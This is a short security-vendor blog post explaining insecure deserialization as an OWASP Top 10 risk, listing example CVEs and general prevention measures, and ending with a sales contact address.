OWASP Top 10 : Insecure Deserialization

The Open Web Application Security Project, or OWASP, is an international non-profit organization dedicated to Web Application Security. The OWASP Top 10 is a standard awareness document representing a broad consensus about the top 10 critical security risks to web applications. Learn more about OWASP Top 10 through this series of short blog posts.


OWASP Top 10 - Insecure Deserialization


What is a Insecure Deserialization?


Serialization is a process of converting objects and its state to a byte stream for ease of communication. Deserialization is recreating that object and its state from that file stream. The process trusts user input and hence any modifications to the code remains unchecked. Vulnerability introduced because of untrusted data modification to the serialized object is insecure deserialization (CWE-502). Deserialization term is also referred to as unpickling or unmarshalling depending on the programming language.


How does insecure deserialization attacks impact business?


Integrity loss due to modification of application object or logic could result in remote code execution. Availability loss because of denial of service and confidentiality loss due to arbitrary file access and privilege escalation.


Some organizations where insecure deserialization was identified

  • CVE-2020-2883 vulnerability in Oracle WebLogic server. Successful attack could takeover the WebLogic server

  • CVE-2020-14000, MIT Lifelong kindergarten Scratch VM vulnerable to could load untrusted project .json file resulting in remote code execution

  • CVE-2019-19395 Telerek UI vulnerability which is used to build forms in ASP.NET AJAX

  • In 2018, deserialization attacks focused on cryptomining by tampering with serialized data and sent to the web application to deserialize

  • CVE-2017-9424, IdeaBlade Breeze.Server.Net. This vulnerability affected the function TypeNameHandling of JSON deserialization

How to prevent a insecure deserialization attack?

  • Implement digital signature to serialized objects to prevent object and data tampering

  • Run deserialization code in isolated and low privilege environment

  • Do not deserialize untrusted data whenever possible. If its needed then use runtime application self protection(RASP)

  • Monitor and alert if a user is constantly deserializing

  • Log exceptions and failures

  • Monitor incoming and outgoing network traffic from containers or servers where deserialization occurs

  • Follow OWASPs guidance on deserializing objects safely


Interested in learning how to know if your organization is vulnerable to insecure deserialization attacks? Drop us a note now at sales@siemba.io